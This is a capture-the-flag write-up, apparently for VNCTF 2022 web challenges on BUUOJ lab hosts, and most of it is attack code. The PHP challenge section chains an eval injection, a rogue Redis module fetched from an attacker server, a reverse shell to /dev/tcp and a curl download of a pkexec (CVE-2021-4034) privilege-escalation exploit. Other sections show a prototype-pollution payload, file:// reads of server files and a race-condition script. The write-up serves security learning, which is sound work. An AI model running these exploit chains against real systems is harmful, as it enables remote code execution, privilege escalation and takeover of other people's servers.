GameV4.0
The flag can be decoded by base64 in the data.js source code
gocalc0
Just send a payload test and find that the returned session decoding has a flag.
Expected solution: https://blog.csdn.net/cosmoslin/article/details/122930836
newcalc0
If the condition of Object.prototype is met, the flag can be obtained. Guess that the prototype chain is polluted. There is also console.log
using cve-2022-21824
console.table([{
x:1}], ["__proto__"]);
After submitting, you can access /flag
InterestingPHP
Many functions are disabled, phpinfo has no read and write files, only the files in the current directory are
/?exp=print_r(scandir("./"));
viewed in the current directory, there
is a configuration file , and the redis key is obtained./?exp=highlight_file('secret.rdb');
Using redis to load modules rce https://xz.aliyun.com/t/5665#toc-14
import requests
url = "http://8c7c47d3-ff45-4aea-8a5e-a2d363a1eb5d.node4.buuoj.cn:81/?exp=eval($_POST[1]);"
headers = {
"content-type": "application/x-www-form-urlencoded"}
def encoder_url(data):
encoder = ""
for single_char in data:
encoder += str(hex(ord(single_char)))
encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
return encoder
so = "http://ip:7777/exp.so"
payload = '''
function getSslPage($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
$result = curl_exec($ch);
curl_close($ch);
file_put_contents("exp.so",$result);
}
getSslPage("%s");
'''.strip()
data = {
1: payload % so
}
fh = requests.post(url, data, headers=headers).text.strip()
print(fh)
gopher = "gopher://127.0.0.1:8888/_"
data = '''
auth ye_w4nt_a_gir1fri3nd
config set dbfilename 666.rdb
module load ./exp.so
system.exec 'bash -c "bash -i >& /dev/tcp/ip/7999 0>&1"'
'''
encoder = encoder_url(data)
payload1 = gopher + encoder
data1 = {
1:payload % payload1
}
fh1 = requests.post(url,data1,headers=headers).text.strip()
print(fh1)
https://github.com/n0b0dyCN/redis-rogue-server uses the so file here.
Before using the script, put the so file on the vps and then start a http service
python3 -m http.server 7777
Get the shell and you will find that the read flag does not have permission to use pkexec's recent privilege escalation vulnerability
https://github.com/arthepsy/CVE-2021-4034 Throw cve-2021-4034-poc.c on the vps
and execute it on the target machine
curl http://118.31.76.240:7777/cve-2021-4034-poc.c > cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
easyJava[reproduce]
Directly read the file web.xml without any information, just read the classes directory
/file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml
/file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes
Look at HelloWorldServlet first. To get the flag, the value of the key must be correct and the value of the deserialized user object attribute must be consistent with this.user
Let’s first look at how to get the key. In the doGet function, the judgments of if and else have the same conflict.
To get the key, you can only get the correct name through conditional competition if the above judgment does not hold. After entering the else, you can get the correct name.
Servlet thread safety problem
# -*- coding: UTF-8 -*-
import requests
import threading
host = "http://aafc6475-042c-4bf7-827e-4f577bb2838d.node4.buuoj.cn:81/"
class myThread (threading.Thread):
def __init__(self, name):
threading.Thread.__init__(self)
self.name = name
def run(self):
print ("开始线程:" + self.name)
runing(self.name)
print ("退出线程:" + self.name)
def runing(name):
while True:
r = requests.get(host+"/evi1?name=%s" % name)
r.encoding = "utf-8"
if r.text.find("The Key is")!=-1:
print(r.text)
return 0
# 创建新线程
thread1 = myThread("asdqwer")
thread2 = myThread("vnctf2022")
# 开启新线程
thread1.start()
thread2.start()
thread1.join()
thread2.join()
Then just serialize one directly to satisfy this.user.equals(u)
package Payload;
import entity.User;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.Base64;
import util.SerAndDe;
public class Ser {
public static void main(String[] args) throws IOException {
User user = new User("m4n_q1u_666","666","180");
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(user);
byte[] ser = bos.toByteArray();
Base64.Encoder encoder = Base64.getEncoder();
String encodedText = encoder.encodeToString(ser);
System.out.println(encodedText);
User user2 = (User) SerAndDe.deserialize(ser);
System.out.println(user2);
}
}
Finally submit the key and the generated base64